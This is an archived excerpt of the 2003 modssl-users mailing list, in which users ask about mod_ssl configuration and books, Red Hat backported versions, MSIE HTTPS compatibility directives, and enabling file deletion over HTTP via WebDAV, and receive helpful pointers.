Delivered-To: modssl-users@modssl.org
Received: from mailhost.det3.ameritech.net (mailhost2-sfldmi.sfldmi.ameritech.net [206.141.193.106])
	by master.modssl.org (Postfix) with ESMTP id 6250E2AA019
	for ; Fri, 16 May 2003 18:50:09 +0200 (CEST)
Received: from danspc ([66.73.181.217]) by mailhost.det3.ameritech.net
          (InterMail vM.4.01.02.17 201-229-119) with SMTP
          id <20030516165007.FVDE176.mailhost.det3.ameritech.net@danspc>
          for ; Fri, 16 May 2003 12:50:07 -0400
From: "Dan" 
To: 
Subject: ModSSL directives & Books about ModSSL 
Date: Fri, 16 May 2003 12:54:30 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Are the apache directives/configuration for modssl handled only by the
openssl package?  Or does modssl have it's own configuration settings?

Also a related question, can anyone recommend any good books that cover Mod
SSL well?  Such as something that covers setting up the apache httpd.conf
file for secure site configuration (if the above applies), ssl apache
directives, installing and maintaining CA certificates, keys, etc?  I
checked amazon and there are only two books on ssl I could find, got a great
recommendation in the openssl forum for two good books on openssl.

Thanks for any info on this (& patience with a modssl newbie question).

Dan

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 16 18:56:43 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 027662AA036; Fri, 16 May 2003 18:56:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id D506E2AA01A
	for ; Fri, 16 May 2003 18:56:32 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA11048;
	Fri, 16 May 2003 12:54:21 -0400
Date: Fri, 16 May 2003 12:54:20 -0400 (EDT)
From: "R. DuFresne" 
To: Dan 
Cc: modssl-users@modssl.org
Subject: Re: RHN ModSSL Backported Version question...
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


moving from redhat's packages to roll-your-own can be a nightmare, a
search of the list archives will turn up alot of posts by John Airey to
this list on this very issue.  mod-ssl is tied to openssl, which is tied
to openssh, soo, breaking one tie can unbind your whole setup.  It's not a
pretty mess, and if you are patcient, and willing to jump hoops, you can
accomplish it, but, have plenty of soap and water handy...

Thanks,

Ron DuFresne


On Fri, 16 May 2003, Dan wrote:

> Hi,
> 
> I currently have mod_ssl-2.0.40-11.3 installed on my server which came with
> my Red Hat Linux 8, kernel 2.4.18-27.8.0 distribution disks.  I noticed that
> the most current version listed on the modssl.org site for mod_ssl is
> 2.8.14-1.3.27 and have a few questions if anyone could assist with I would
> appreciate it much.
> 
> I'm on the Red Hat Network and receive errata bug fix and security
> advisories - reports for mods on my server.  Currently I don't have any bug
> fix or security advisories for Mod_SSL.  Should I be worried that I have an
> older version according to the mod_ssl site and upgrade my current version
> of mod_ssl?
> 
> Because someone told me that the red hat version numbers do not always match
> the most current mod version numbers from their originating sources and that
> the mod_ssl package that I currently have from rh should be ok because red
> hat
> applies security fixes without changing the numbers or providing different
> version numbers - backporting.  Is this correct for modssl too?  If so, how
> would I find out if my version of RH mod_ssl is safe?
> 
> If I do upgrade mod_ssl to the most current version listed on the modssl.org
> site, will it break anything or cause dependency issues on the server?
> Because I have five live e-commerce sites using mod_ssl and Thawte
> certificates, and I don't want to cause more trouble than I have.  But of
> course if having the old versions poses a security risk I guess I should
> upgrade.
> 
> Any advice would be appreciated.
> 
> Thanks much.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri May 16 18:58:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 69D6B2AA040; Fri, 16 May 2003 18:58:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id 023632AA032
	for ; Fri, 16 May 2003 18:58:55 +0200 (CEST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id C2CEC38141; Fri, 16 May 2003 10:14:03 -0700 (PDT)
Date: Fri, 16 May 2003 10:14:03 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: ModSSL directives & Books about ModSSL
Message-ID: <20030516171403.GA10743@rawbyte.com>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


> Are the apache directives/configuration for modssl handled only by the
> openssl package?  Or does modssl have it's own configuration settings?
> SSL well?  Such as something that covers setting up the apache httpd.conf
> file for secure site configuration (if the above applies), ssl apache
> directives, installing and maintaining CA certificates, keys, etc?  I
> checked amazon and there are only two books on ssl I could find, got a great
> recommendation in the openssl forum for two good books on openssl.

I have the mod_ssl chapter of my book freely available online. I think
together with the mod_ssl reference documentation you should be fine, it
covers everything you mention. It is oriented towards Apache 2

http://www.apacheworld.org/ty24/site.chapter17.html

Best regards

Daniel
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 20 01:33:00 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DB7692AA039; Tue, 20 May 2003 01:32:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web41509.mail.yahoo.com (web41509.mail.yahoo.com [66.218.93.92])
	by master.modssl.org (Postfix) with SMTP id 72AAC2AA019
	for ; Tue, 20 May 2003 01:32:55 +0200 (CEST)
Message-ID: <20030519233222.95526.qmail@web41509.mail.yahoo.com>
Received: from [130.86.72.20] by web41509.mail.yahoo.com via HTTP; Mon, 19 May 2003 16:32:22 PDT
Date: Mon, 19 May 2003 16:32:22 -0700 (PDT)
From: kulkarni veena 
Subject: https not working for MSIE..
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: kulkarni veena 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Even though I have this code in the ssl.conf i see
that MSIE is trying to use http1.1 , TLS protocol.

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
Hence i forced internet explorer to use only http 1.0
and SSLv2, but still https does not seem to work. 
This makes me wonder if the problem is due to
"keepalive"  facility?

Do I need to do something else for SetEnvIf to work?

Note: i also tried adding this:
BrowserMatch MSIE[4-5] nokeepalive downgrade-1.0 force
response-1.0

which also did not help to make it work on MSIE.

Thanks in advance.

--veena


__________________________________
Do you Yahoo!?
The New Yahoo! Search - Faster. Easier. Bingo.
http://search.yahoo.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 20 02:27:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 748A92AA039; Tue, 20 May 2003 02:27:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mta4.rcsntx.swbell.net (mta4.rcsntx.swbell.net [151.164.30.28])
	by master.modssl.org (Postfix) with ESMTP id AF42D2AA019
	for ; Tue, 20 May 2003 02:27:55 +0200 (CEST)
Received: from christopher.tokpela.com (gw.vwxyz.com [63.200.61.35])
	by mta4.rcsntx.swbell.net (8.12.9/8.12.3) with ESMTP id h4K0RfPD008811
	for ; Mon, 19 May 2003 19:27:52 -0500 (CDT)
Message-Id: <5.2.1.1.2.20030519171956.04e984b0@opal.he.net>
X-Sender: efaqs.com/christopher@opal.he.net
X-Mailer: QUALCOMM Windows Eudora Version 5.2.1
Date: Mon, 19 May 2003 17:29:17 -0700
To: modssl-users@modssl.org
From: Christopher Taranto 
Subject: Re[2]: https not working for MSIE..
In-Reply-To: <20030519233222.95526.qmail@web41509.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christopher Taranto 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Veena,

There have been many different discussions on this topic - like adding an 
SSLSessionCache

Search through the archives using MSIE as the keyword and you should have 
most of the messages in the archives that pertain to this problem.

http://marc.theaimsgroup.com/?l=apache-modssl

HTH,

Christopher Taranto


At 04:32 PM 5/19/03 -0700, you wrote:
>Hi,
>
>Even though I have this code in the ssl.conf i see
>that MSIE is trying to use http1.1 , TLS protocol.
>
>SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
>Hence i forced internet explorer to use only http 1.0
>and SSLv2, but still https does not seem to work.
>This makes me wonder if the problem is due to
>"keepalive"  facility?
>
>Do I need to do something else for SetEnvIf to work?
>
>Note: i also tried adding this:
>BrowserMatch MSIE[4-5] nokeepalive downgrade-1.0 force
>response-1.0
>
>which also did not help to make it work on MSIE.
>
>Thanks in advance.
>
>--veena
>
>
>__________________________________
>Do you Yahoo!?
>The New Yahoo! Search - Faster. Easier. Bingo.
>http://search.yahoo.com
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 21 16:58:54 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9407D2AA033; Wed, 21 May 2003 16:58:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imbaspam-ny04.iplex.ssmb.com (mail4.ssmb.com [199.67.139.129])
	by master.modssl.org (Postfix) with ESMTP id F3CE52AA015
	for ; Wed, 21 May 2003 16:58:52 +0200 (CEST)
Received: from imbarc-ny02.ny.ssmb.com (imbarc-ny02.ny.ssmb.com [162.124.186.139])
	by imbaspam-ny04.iplex.ssmb.com (8.12.9/8.12.9/SSMB_EXT/evision: 1.19 $) with ESMTP id h4LEwnvI017259
	for ; Wed, 21 May 2003 10:58:50 -0400 (EDT)
Received: from mailhub-nyc2.ny.ssmb.com (mailhub-nyc2-hme0.ny.ssmb.com [162.124.148.16])
	by imbarc-ny02.ny.ssmb.com (8.12.9/8.12.9/SSMB_QQQ_IN/1.1) with ESMTP id h4LEwhP0009669
	for ; Wed, 21 May 2003 10:58:43 -0400 (EDT)
Received: from exnjims01.nj.ssmb.com (EXNJIMS01.nj.ssmb.com [150.110.235.50])
	by mailhub-nyc2.ny.ssmb.com (8.9.3-GEMSp2/8.9.3/SSMB-HUB) with ESMTP id KAA26567
	for ; Wed, 21 May 2003 10:58:43 -0400 (EDT)
Received: by EXNJIMS01.nj.ssmb.com with Internet Mail Service (5.5.2655.55)
	id ; Wed, 21 May 2003 10:58:43 -0400
Message-ID: <9F1AE1497901D71185A20002A56B9B2601B0FC1D@exchny43.ny.ssmb.com>
From: "Nauman, Ahmed [IT]" 
To: "'modssl-users@modssl.org'" 
Subject: RE: ModSSL directives & Books about ModSSL
Date: Wed, 21 May 2003 10:58:38 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain
X-Scanned-By: MIMEDefang 2.33 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nauman, Ahmed [IT]" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All,

I want to provide HTTP & HTTPS delete option on my webserver [general and
some specific folder]. 

apache [1.3.27] with mod-ssl

Do i need to make any configuration changes on server side to support it ?
Any config sample will be highly appreciated.

Regards
Nauman


-----Original Message-----
From: Daniel Lopez [mailto:daniel@rawbyte.com]
Sent: Friday, May 16, 2003 1:14 PM
To: modssl-users@modssl.org
Subject: Re: ModSSL directives & Books about ModSSL



> Are the apache directives/configuration for modssl handled only by the
> openssl package?  Or does modssl have it's own configuration settings?
> SSL well?  Such as something that covers setting up the apache httpd.conf
> file for secure site configuration (if the above applies), ssl apache
> directives, installing and maintaining CA certificates, keys, etc?  I
> checked amazon and there are only two books on ssl I could find, got a
great
> recommendation in the openssl forum for two good books on openssl.

I have the mod_ssl chapter of my book freely available online. I think
together with the mod_ssl reference documentation you should be fine, it
covers everything you mention. It is oriented towards Apache 2

http://www.apacheworld.org/ty24/site.chapter17.html

Best regards

Daniel
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May 21 19:53:03 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9D10A2AA033; Wed, 21 May 2003 19:53:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from enroque.rawbyte.com (adsl-63-192-218-231.dsl.snfc21.pacbell.net [63.192.218.231])
	by master.modssl.org (Postfix) with ESMTP id 916312AA015
	for ; Wed, 21 May 2003 19:52:58 +0200 (CEST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id AFD0E38241; Wed, 21 May 2003 11:08:31 -0700 (PDT)
Date: Wed, 21 May 2003 11:08:31 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: ModSSL directives & Books about ModSSL
Message-ID: <20030521180831.GC5630@rawbyte.com>
References: <9F1AE1497901D71185A20002A56B9B2601B0FC1D@exchny43.ny.ssmb.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <9F1AE1497901D71185A20002A56B9B2601B0FC1D@exchny43.ny.ssmb.com>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I guess by "delete option" you mean the delete WebDAV method that allows
clients to remove files from the web server. I have another chapter online
on it:

http://www.apacheworld.org/ty24/site.chapter13.html

It is for Apache 2, which already includes mod_dav. For Apache 1.3 it should
work too, but you will need to download and install mod_dav separately,
checkout htp://www.webdav.org

> Hi All,
> 
> I want to provide HTTP & HTTPS delete option on my webserver [general and
> some specific folder]. 
> 
> apache [1.3.27] with mod-ssl
> 
> Do i need to make any configuration changes on server side to support it ?
> Any config sample will be highly appreciated.
> 
> Regards
> Nauman
> 
> 
> -----Original Message-----
> From: Daniel Lopez [mailto:daniel@rawbyte.com]
> Sent: Friday, May 16, 2003 1:14 PM
> To: modssl-users@modssl.org
> Subject: Re: ModSSL directives & Books about ModSSL
> 
> 
> 
> > Are the apache directives/configuration for modssl handled only by the
> > openssl package?  Or does modssl have it's own configuration settings?
> > SSL well?  Such as something that covers setting up the apache httpd.conf
> > file for secure site configuration (if the above applies), ssl apache
> > directives, installing and maintaining CA certificates, keys, etc?  I
> > checked amazon and there are only two books on ssl I could find, got a
> great
> > recommendation in the openssl forum for two good books on openssl.
> 
> I have the mod_ssl chapter of my book freely available online. I think
> together with the mod_ssl reference documentation you should be fine, it
> covers everything you mention. It is oriented towards Apache 2
> 
> http://www.apacheworld.org/ty24/site.chapter17.html
> 
> Best regards
> 
> Daniel
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 22 17:16:48 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C08332AA033; Thu, 22 May 2003 17:16:48 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from imbaspam-ny04.iplex.ssmb.com (mail4.ssmb.com [199.67.139.129])
	by master.modssl.org (Postfix) with ESMTP id C6F272AA024
	for ; Thu, 22 May 2003 17:16:46 +0200 (CEST)
Received: from imbarc-ny01.ny.ssmb.com (imbarc-ny01.ny.ssmb.com [162.124.186.138])
	by imbaspam-ny04.iplex.ssmb.com (8.12.9/8.12.9/SSMB_EXT/evision: 1.19 $) with ESMTP id h4MFGeCP002580
	for ; Thu, 22 May 2003 11:16:41 -0400 (EDT)
Received: from mailhub390.corp.smb.com (mailhub390.corp.smb.com [146.128.202.18])
	by imbarc-ny01.ny.ssmb.com (8.12.9/8.12.9/SSMB_QQQ_IN/1.1) with ESMTP id h4MFGSE6004636
	for ; Thu, 22 May 2003 11:16:28 -0400 (EDT)
Received: from exnyims01.nj.ssmb.com (EXNYIMS01.ny.ssmb.com [162.124.190.168])
	by mailhub390.corp.smb.com (8.9.3-GEMSp2/8.9.3/SSMB-HUB) with ESMTP id LAA22375
	for ; Thu, 22 May 2003 11:16:28 -0400 (EDT)
Received: by EXNYIMS01.ny.ssmb.com with Internet Mail Service (5.5.2655.55)
	id ; Thu, 22 May 2003 11:16:13 -0400
Message-ID: <9F1AE1497901D71185A20002A56B9B2601B0FC23@exchny43.ny.ssmb.com>
From: "Nauman, Ahmed [IT]" 
To: "'modssl-users@modssl.org'" 
Subject: RE: ModSSL directives & Books about ModSSL
Date: Thu, 22 May 2003 11:16:24 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain
X-Scanned-By: MIMEDefang 2.33 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nauman, Ahmed [IT]" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks Daniel,

Is there any other way of deleting file through HTTP ?

Infact i have to implement this for multiple web servers like iPlanet, IIS
etc. So i am trying to design some strategy, which can be worked out in all.

Regards
Nauman

-----Original Message-----
From: Daniel Lopez [mailto:daniel@rawbyte.com]
Sent: Wednesday, May 21, 2003 2:09 PM
To: modssl-users@modssl.org
Subject: Re: ModSSL directives & Books about ModSSL



I guess by "delete option" you mean the delete WebDAV method that allows
clients to remove files from the web server. I have another chapter online
on it:

http://www.apacheworld.org/ty24/site.chapter13.html

It is for Apache 2, which already includes mod_dav. For Apache 1.3 it should
work too, but you will need to download and install mod_dav separately,
checkout htp://www.webdav.org

> Hi All,
> 
> I want to provide HTTP & HTTPS delete option on my webserver [general and
> some specific folder]. 
> 
> apache [1.3.27] with mod-ssl
> 
> Do i need to make any configuration changes on server side to support it ?
> Any config sample will be highly appreciated.
> 
> Regards
> Nauman
> 
> 
> -----Original Message-----
> From: Daniel Lopez [mailto:daniel@rawbyte.com]
> Sent: Friday, May 16, 2003 1:14 PM
> To: modssl-users@modssl.org
> Subject: Re: ModSSL directives & Books about ModSSL
> 
> 
> 
> > Are the apache directives/configuration for modssl handled only by the
> > openssl package?  Or does modssl have it's own configuration settings?
> > SSL well?  Such as something that covers setting up the apache
httpd.conf
> > file for secure site configuration (if the above applies), ssl apache
> > directives, installing and maintaining CA certificates, keys, etc?  I
> > checked amazon and there are only two books on ssl I could find, got a
> great
> > recommendation in the openssl forum for two good books on openssl.
> 
> I have the mod_ssl chapter of my book freely available online. I think
> together with the mod_ssl reference documentation you should be fine, it
> covers everything you mention. It is oriented towards Apache 2
> 
> http://www.apacheworld.org/ty24/site.chapter17.html
> 
> Best regards
> 
> Daniel
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 22 17:31:17 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 120352AA033; Thu, 22 May 2003 17:31:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [209.170.144.33])
	by master.modssl.org (Postfix) with ESMTP id 029782AA019
	for ; Thu, 22 May 2003 17:31:13 +0200 (CEST)
Received: from blackhole.sysinfo.com (dufresne@blackhole.sysinfo.com [209.170.142.145])
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id LAA14481
	for ; Thu, 22 May 2003 11:29:25 -0400
Date: Thu, 22 May 2003 11:29:24 -0400 (EDT)
From: "R. DuFresne" 
To: "'modssl-users@modssl.org'" 
Subject: RE: ModSSL directives & Books about ModSSL
In-Reply-To: <9F1AE1497901D71185A20002A56B9B2601B0FC23@exchny43.ny.ssmb.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


If your needs is for dealing with content, especially content of multiple
clients and such, you might take a look at rsync, and rsync under ssh,
there is a dos/windoes version available.  Of course a more specific
description of what you wish to try and do might help folks in suggesting
how to accomplish the chore.

Thanks,

Ron DuFresne

On Thu, 22 May 2003, Nauman, Ahmed [IT] wrote:

> Thanks Daniel,
> 
> Is there any other way of deleting file through HTTP ?
> 
> Infact i have to implement this for multiple web servers like iPlanet, IIS
> etc. So i am trying to design some strategy, which can be worked out in all.
> 
> Regards
> Nauman
> 
> -----Original Message-----
> From: Daniel Lopez [mailto:daniel@rawbyte.com]
> Sent: Wednesday, May 21, 2003 2:09 PM
> To: modssl-users@modssl.org
> Subject: Re: ModSSL directives & Books about ModSSL
> 
> 
> 
> I guess by "delete option" you mean the delete WebDAV method that allows
> clients to remove files from the web server. I have another chapter online
> on it:
> 
> http://www.apacheworld.org/ty24/site.chapter13.html
> 
> It is for Apache 2, which already includes mod_dav. For Apache 1.3 it should
> work too, but you will need to download and install mod_dav separately,
> checkout htp://www.webdav.org
> 
> > Hi All,
> > 
> > I want to provide HTTP & HTTPS delete option on my webserver [general and
> > some specific folder]. 
> > 
> > apache [1.3.27] with mod-ssl
> > 
> > Do i need to make any configuration changes on server side to support it ?
> > Any config sample will be highly appreciated.
> > 
> > Regards
> > Nauman
> > 
> > 
> > -----Original Message-----
> > From: Daniel Lopez [mailto:daniel@rawbyte.com]
> > Sent: Friday, May 16, 2003 1:14 PM
> > To: modssl-users@modssl.org
> > Subject: Re: ModSSL directives & Books about ModSSL
> > 
> > 
> > 
> > > Are the apache directives/configuration for modssl handled only by the
> > > openssl package?  Or does modssl have it's own configuration settings?
> > > SSL well?  Such as something that covers setting up the apache
> httpd.conf
> > > file for secure site configuration (if the above applies), ssl apache
> > > directives, installing and maintaining CA certificates, keys, etc?  I
> > > checked amazon and there are only two books on ssl I could find, got a
> > great
> > > recommendation in the openssl forum for two good books on openssl.
> > 
> > I have the mod_ssl chapter of my book freely available online. I think
> > together with the mod_ssl reference documentation you should be fine, it
> > covers everything you mention. It is oriented towards Apache 2
> > 
> > http://www.apacheworld.org/ty24/site.chapter17.html
> > 
> > Best regards
> > 
> > Daniel
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 22 17:34:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4E2682AA033; Thu, 22 May 2003 17:34:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from awel71p3.awecomm.com (mail.gosedan.com [12.40.128.139])
	by master.modssl.org (Postfix) with SMTP id 962272AA024
	for ; Thu, 22 May 2003 17:34:55 +0200 (CEST)
Received: (qmail 3724 invoked from network); 22 May 2003 15:22:57 -0000
Received: from unknown (HELO ktklaptop) (67.8.147.149)
  by 0 with SMTP; 22 May 2003 15:22:57 -0000
From: "Kevin" 
To: 
Subject: SSL certs
Date: Thu, 22 May 2003 11:36:00 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
In-Reply-To: <9F1AE1497901D71185A20002A56B9B2601B0FC23@exchny43.ny.ssmb.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
